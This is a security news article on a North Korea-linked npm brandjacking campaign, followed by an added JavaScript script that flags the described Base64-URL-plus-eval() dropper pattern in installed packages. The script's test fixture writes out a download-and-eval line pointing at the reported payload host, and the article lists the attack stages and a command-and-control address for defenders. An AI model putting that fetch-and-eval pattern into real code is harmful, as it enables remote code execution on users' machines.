A new npm campaign linked to North Korea’s Lazarus Group shows how attackers are using familiar-looking package names to gain access to developers’ systems and software build environments.
Sonatype Security Research said it is tracking dozens of malicious npm packages connected to the campaign, including some that reached up to 500 weekly downloads. The packages were designed to look related to trusted JavaScript projects and tools, increasing the chance that developers would install them during normal work.
Usually, hackers exploit techniques like typosquatting in such attacks; however, in this case, Sonatype found packages using brandjacking methods such as suffix additions, embedded project names, and version mimicry. Some of the examples spotted by researchers included names built around well-known projects such as Buffer, Chai, React, Express, JWT, and Webpack.
That naming strategy is more likely to work in favor of attackers because npm is full of small helper libraries, wrappers, and plugins. A package called buffer-utilities, for example, can appear to be a reasonable companion to the widely used buffer package, even if it has no legitimate connection to the project.
Sonatype’s analysis of buffer-utilities found that the package included copied code from the real buffer library, but also worked as a malicious dropper. Once installed, it decoded Base64-encoded URLs, fetched remote content from www.jsonkeeper.com, and executed the retrieved code using eval().
Researchers said that the pattern appeared in other packages linked to the same Lazarus activity. The use of www.jsonkeeper.com is also notable because Sonatype has previously observed Lazarus using the service to host payloads.
After the first stage runs, the malware can install a Node.js backdoor and downloader. That payload collects basic system details, including the hostname, username, operating system, home directory, and process arguments. It then contacts the command and control infrastructure to receive further instructions.
The malware can also create a hidden .vscode directory in the user’s home folder, download more files, and launch attacker-controlled JavaScript as a detached background process. Sonatype said the package can fetch a third-stage payload called f.js along with a package.json file, then run npm install --silent before starting the payload.
That behavior gives the attacker a way to maintain access and refresh malicious files over time. Sonatype also reported an update mechanism that lets the payload reconnect to command and control servers, check for newer versions, and replace local files.
The campaign shows why npm remains attractive to advanced threat actors. Developers often install packages based on name familiarity, project fit, or convenience, especially in JavaScript environments where small dependencies are common.
The Lazarus connection adds weight to the findings. While the group is often associated with financial theft and high-profile cyber espionage operations, this activity shows the group’s interest in developer machines, credentials, build systems, and long-term access to enterprise environments.
Organizations that installed buffer-utilities version 1.0.0 or packages associated with Sonatype identifier sonatype-2026-003558 should remove them and review affected systems for signs of further compromise. Sonatype warned that removal alone may not be enough if later payloads have already run.
Administrators should also check for network connections to www.jsonkeeper.com, command and control traffic to 45.59.163.198:1244, unexpected .vscode folders in user home directories, unusual Node.js processes, and any unexplained credential access from developer workstations or build systems.
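One way to triage installed package source for the dropper pattern described above (a Base64-encoded URL decoded at runtime and handed to eval()), as an added example that is not Sonatype's code or anything from the campaign. The sample source strings are constructed fixtures; www.jsonkeeper.com is the host named in the report, while the URL path is a placeholder.

```javascript
// Added example: static triage of a package's JavaScript for the described dropper signature.
// Assumption: the only known payload host is the one the report names; extend the set as needed.
const KNOWN_PAYLOAD_HOSTS = new Set(['www.jsonkeeper.com']);
// Candidate Base64 string literals: long enough to hold a URL, valid alphabet, optional padding.
const B64_LITERAL = /['"`]([A-Za-z0-9+/]{16,}={0,2})['"`]/g;
// Dynamic code execution sinks that a dropper would feed fetched content into.
const EVAL_LIKE = /\beval\s*\(|new\s+Function\s*\(/;

// Decode every Base64 literal in the source and keep those that decode to an http(s) URL.
function decodedUrls(source) {
  const urls = [];
  for (const m of source.matchAll(B64_LITERAL)) {
    const text = Buffer.from(m[1], 'base64').toString('utf8');
    if (!/^https?:\/\/\S+$/.test(text)) continue;   // not a URL once decoded
    try { urls.push(new URL(text)); } catch { /* unparseable, ignore */ }
  }
  return urls;
}

// Triage one file: hidden URL plus eval()/Function() is the dropper signature,
// a hidden URL alone is worth a look, anything else is left as clean.
function triageSource(source) {
  const urls = decodedUrls(source);
  const findings = [];
  for (const u of urls) {
    findings.push(`base64-hidden URL: ${u.href}`);
    if (KNOWN_PAYLOAD_HOSTS.has(u.hostname)) findings.push(`known payload host: ${u.hostname}`);
  }
  const hasEval = EVAL_LIKE.test(source);
  let verdict = 'clean';
  if (urls.length > 0 && hasEval) {
    findings.push('fetched content reaches eval()/Function()');
    verdict = 'malicious-pattern';
  } else if (urls.length > 0) {
    verdict = 'suspicious';
  }
  return { verdict, findings };
}

// Constructed fixtures: one mimics the described dropper shape, one is an ordinary helper.
const hidden = Buffer.from('https://www.jsonkeeper.com/b/PLACEHOLDER', 'utf8').toString('base64');
const SAMPLE_DROPPER = `const u = Buffer.from('${hidden}', 'base64').toString();
fetch(u).then(r => r.text()).then(code => eval(code));`;
const SAMPLE_BENIGN = `module.exports = (a, b) => Buffer.concat([a, b]);`;

console.log(JSON.stringify(triageSource(SAMPLE_DROPPER)));
console.log(JSON.stringify(triageSource(SAMPLE_BENIGN)));
```

Run it over each .js file under node_modules of an affected project; a 'malicious-pattern' verdict on a helper-sized package is a strong reason to pull it and check the host for the later-stage indicators listed above.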